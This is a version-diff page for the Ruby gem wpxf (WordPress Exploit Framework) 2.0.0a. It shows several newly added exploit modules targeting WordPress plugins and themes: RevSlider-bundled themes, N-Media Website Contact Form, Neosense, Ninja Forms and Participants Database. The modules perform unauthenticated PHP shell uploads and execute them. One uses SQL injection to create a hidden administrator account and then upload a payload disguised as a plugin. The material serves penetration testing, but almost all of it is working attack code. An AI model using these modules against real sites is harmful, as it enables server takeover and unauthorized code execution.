RubyGems - wpxf - Versions diffs - 2.0.0a - Mend

wpxf 2.0.0a

Files changed (455) hide show

data/lib/wpxf/modules/exploit/shell/modular_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::ModularRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Modular Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Modular theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/myriad_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::MyriadRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Myriad Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Myriad theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/shell/n_media_website_contact_form_shell_upload.rb ADDED

@@ -0,0 +1,82 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NMediaWebsiteContactFormShellUpload < Wpxf::Module
+  include Wpxf
+  def initialize
+    super
+    update_info(
+      name: 'N-Media Website Contact Form <= 1.3.4 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions '\
+            '<= 1.3.4 of the N-Media Website Contact Form plugin which '\
+            'allows unauthenticated users to upload and execute PHP scripts '\
+            'in the context of the web server.',
+      author: [
+        'Claudio Viviani', # Vulnerability discovery
+        'rastating'        # WPXF module
+      ],
+      references: [
+        ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
+        ['WPVDB', '7896']
+      ],
+      date: 'Apr 12 2015'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.4')
+  end
+  def payload_body_builder(payload_name)
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('Filedata', payload.encoded, payload_name)
+    builder.add_field('action', 'nm_webcontact_upload_file')
+    builder
+  end
+  def run
+    return false unless super
+    emit_info 'Preparing payload...'
+    payload_name = "#{Utility::Text.rand_alpha(rand(5..10))}.php"
+    builder = payload_body_builder(payload_name)
+    emit_info 'Uploading payload...'
+    res = nil
+    builder.create do |body|
+      res = execute_post_request(url: wordpress_url_admin_ajax, body: body)
+    end
+    if res.nil? || res.timed_out?
+      emit_error 'No response from the target'
+      return false
+    end
+    if res.code != 200 || res.body !~ /filename/i
+      emit_info "Response code: #{res.code}", true
+      emit_info "Response body: #{res.body}", true
+      emit_error 'Failed to upload payload'
+      return false
+    end
+    begin
+      stored_name = JSON.parse(res.body)['filename']
+    rescue StandardError => e
+      emit_info "Response body: #{res.body}", true
+      emit_error "Failed to parse response: #{e}"
+      return false
+    end
+    payload_url = normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', stored_name)
+    emit_success "Uploaded the payload to #{payload_url}", true
+    emit_info 'Executing the payload...'
+    res = execute_get_request(url: payload_url)
+    if res && res.code == 200 && !res.body.strip.empty?
+      emit_success "Result: #{res.body}"
+    end
+    return true
+  end
+end

data/lib/wpxf/modules/exploit/shell/n_media_website_contact_form_v1.9_shell_upload.rb ADDED

@@ -0,0 +1,45 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NMediaWebsiteContactFormV19ShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'N-Media Website Contact Form >= 1.9 Shell Upload',
+      author: [
+        'White Fir Design', # Vulnerability discovery
+        'rastating'         # WPXF module
+      ],
+      references: [
+        ['URL', 'https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-website-contact-form-with-file-upload/'],
+        ['WPVDB', '8623']
+      ],
+      date: 'Sep 19 2016'
+    )
+  end
+  def check
+    check_plugin_version_from_readme('website-contact-form-with-file-upload', nil, '1.9')
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('file', payload.encoded, payload_name)
+    builder.add_field('name', payload_name)
+    builder.add_field('action', 'nm_webcontact_upload_file')
+    builder
+  end
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+  def uploaded_payload_location
+    stored_name = JSON.parse(upload_result.body)['file_name']
+    return normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', stored_name)
+  rescue StandardError => e
+    raise "Failed to parse response: #{e}"
+  end
+end

data/lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb ADDED

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NeosenseShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Neosense Theme <= 1.7 Unauthenticated Shell Upload',
+      author: [
+        'Walter Hop', # Discovery and disclosure
+        'rastating'   # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8622'],
+        ['URL', 'https://lifeforms.nl/20160919/unrestricted-upload-neosense']
+      ],
+      date: 'Sep 19 2016'
+    )
+  end
+  def check
+    check_theme_version_from_style('neosense', '1.8')
+  end
+  def uploader_url
+    normalize_uri(wordpress_url_themes, 'neosense', 'js', 'back-end', 'libraries', 'fileuploader', 'upload_handler.php')
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_file_from_string('qqfile', payload.encoded, payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    result = JSON.parse(upload_result.body)
+    result['url']
+  end
+end

data/lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb ADDED

@@ -0,0 +1,83 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::NinjaFormsUnauthenticatedShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Ninja Forms 2.9.36 to 2.9.42 Unauthenticated Shell Upload',
+      author: [
+        'James Golovich', # Discovery and disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['CVE', '2016-1209'],
+        ['WPVDB', '8485'],
+        ['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities']
+      ],
+      date: 'May 04 2016'
+    )
+    register_options([
+      StringOption.new(
+        name: 'form_path',
+        desc: 'The relative path of the page that hosts any form served by Ninja Forms',
+        required: true
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36')
+  end
+  def uploader_url
+    wordpress_url_admin_ajax
+  end
+  def payload_body_builder
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'nf_async_upload')
+    builder.add_field('security', ninja_form_nonce)
+    builder.add_file_from_string(Utility::Text.rand_alpha(5), payload.encoded, payload_name)
+    builder
+  end
+  def uploaded_payload_location
+    normalize_uri(wordpress_url_uploads, "nftmp-#{payload_name.downcase}")
+  end
+  def fetch_ninja_form_nonce
+    res = execute_get_request(url: normalize_uri(full_uri, datastore['form_path']))
+    return false unless res && res.code == 200
+    @ninja_form_nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
+    @ninja_form_nonce
+  end
+  def before_upload
+    # Enable the v3 functionality.
+    emit_info 'Enabling vulnerable V3 functionality...'
+    execute_get_request(url: full_uri, params: { 'nf-switcher' => 'upgrade' })
+    # Fetch a nonce for the upload.
+    emit_info 'Fetching Ninja Form nonce...'
+    unless fetch_ninja_form_nonce
+      emit_error 'Failed to acquire a valid nonce'
+      emit_error "Ensure that #{normalize_uri(full_uri, datastore['form_path'])} contains a valid form"
+      return false
+    end
+    emit_success "Nonce acquired: #{ninja_form_nonce}", true
+    super
+  end
+  def cleanup
+    # Disable the v3 functionality.
+    execute_get_request(url: full_uri, params: { 'nf-switcher' => 'rollback' })
+    super
+  end
+  attr_reader :ninja_form_nonce
+end

data/lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb ADDED

@@ -0,0 +1,153 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::ParticipantsDatabaseV1548ShellUpload < Wpxf::Module
+  include Wpxf
+  include Wpxf::WordPress::Plugin
+  def initialize
+    super
+    update_info(
+      name: 'Participants Database <= 1.5.4.8 Shell Upload',
+      desc: %(
+        In versions <= 1.5.4.8 of the Participants Database, anonymous users
+        are able to execute arbitrary SQL statements. This module utilises
+        this vulnerability to create a new admin user and upload a payload
+        masked as a plugin.
+      ),
+      author: [
+        'Yarubo Research Team', # Vulnerability discovery
+        'rastating'             # WPXF module
+      ],
+      references: [
+        ['CVE', '2014-3961'],
+        ['WPVDB', '7247'],
+        ['EDB', '33613']
+      ],
+      date: 'Aug 01 2014'
+    )
+    register_options([
+      StringOption.new(
+        name: 'sign_up_path',
+        desc: 'The relative path of the Participants Database sign up page',
+        required: true
+      ),
+      StringOption.new(
+        name: 'wp_prefix',
+        desc: 'The database table prefix. Default: wp_',
+        required: true,
+        default: 'wp_'
+      ),
+      IntegerOption.new(
+        name: 'user_id',
+        desc: 'The ID number to use for the new admin account',
+        required: true,
+        default: (60_000..90_000).to_a.sample
+      ),
+      StringOption.new(
+        name: 'username',
+        desc: 'The username to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_alpha(6)
+      ),
+      StringOption.new(
+        name: 'password',
+        desc: 'The password to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_alpha(6)
+      ),
+      StringOption.new(
+        name: 'email',
+        desc: 'The e-mail address to use for the new admin account',
+        required: true,
+        default: Utility::Text.rand_email
+      )
+    ])
+  end
+  def check
+    check_plugin_version_from_readme('participants-database', '1.5.4.9')
+  end
+  def sign_up_url
+    normalize_uri(full_uri, datastore['sign_up_path'])
+  end
+  def user_id
+    normalized_option_value('user_id')
+  end
+  def hexified_username
+    "0x#{Utility::Text.hexify_string(datastore['username'])}"
+  end
+  def password_hash
+    Utility::Text.md5(datastore['password'])
+  end
+  def hexified_password_hash
+    "0x#{Utility::Text.hexify_string(password_hash)}"
+  end
+  def hexified_email
+    "0x#{Utility::Text.hexify_string(datastore['email'])}"
+  end
+  def table_name(name)
+    "#{datastore['wp_prefix']}#{name}"
+  end
+  def new_user_sql
+    [
+      "insert into #{table_name('users')}",
+      '(ID, user_login, user_pass, user_nicename, user_email, user_status, display_name)',
+      'values',
+      "(#{user_id}, #{hexified_username}, #{hexified_password_hash}, #{hexified_username}, #{hexified_email}, 0, #{hexified_username});"
+    ].join(' ')
+  end
+  def user_meta_sql(key, value)
+    [
+      "insert into #{table_name('usermeta')}",
+      '(user_id, meta_key, meta_value) values',
+      "(#{user_id}, 0x#{Utility::Text.hexify_string(key)}, 0x#{Utility::Text.hexify_string(value)})"
+    ].join(' ')
+  end
+  def execute_sql_query(query)
+    builder = Utility::BodyBuilder.new
+    builder.add_field('action', 'output CSV')
+    builder.add_field('subsource', 'participants-database')
+    builder.add_field('CSV_type', 'participant list')
+    builder.add_field('query', query)
+    builder.create do |body|
+      execute_post_request(url: sign_up_url, body: body)
+    end
+  end
+  def update_user_meta(key, value)
+    execute_sql_query(user_meta_sql(key, value))
+  end
+  def execute_payload
+    emit_info 'Uploading the payload...'
+    cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
+    res = upload_payload_as_plugin_and_execute(Utility::Text.rand_alpha(6), Utility::Text.rand_alpha(6), cookie)
+    res&.code != 404
+  end
+  def run
+    return false unless super
+    emit_info 'Creating a new user...'
+    execute_sql_query(new_user_sql)
+    emit_info 'Elevating user privileges...'
+    update_user_meta('wp_user_level', '10')
+    update_user_meta('wp_capabilities', 'a:1:{s:13:"administrator";b:1;}')
+    execute_payload
+  end
+end

data/lib/wpxf/modules/exploit/shell/persuasion_revslider_shell_upload.rb ADDED

@@ -0,0 +1,15 @@
+# frozen_string_literal: true
+class Wpxf::Exploit::PersuasionRevsliderShellUpload < Wpxf::Exploit::RevsliderShellUpload
+  def initialize
+    super
+    update_info(
+      name: 'Persuasion Theme RevSlider <= 3.0.95 Shell Upload',
+      desc: 'This module exploits a file upload vulnerability in versions of '\
+            'the Persuasion theme that include versions <= 3.0.95 of the '\
+            'RevSlider plugin which allows unauthenticated users to upload '\
+            'and execute PHP scripts in the context of the web server.'
+    )
+  end
+end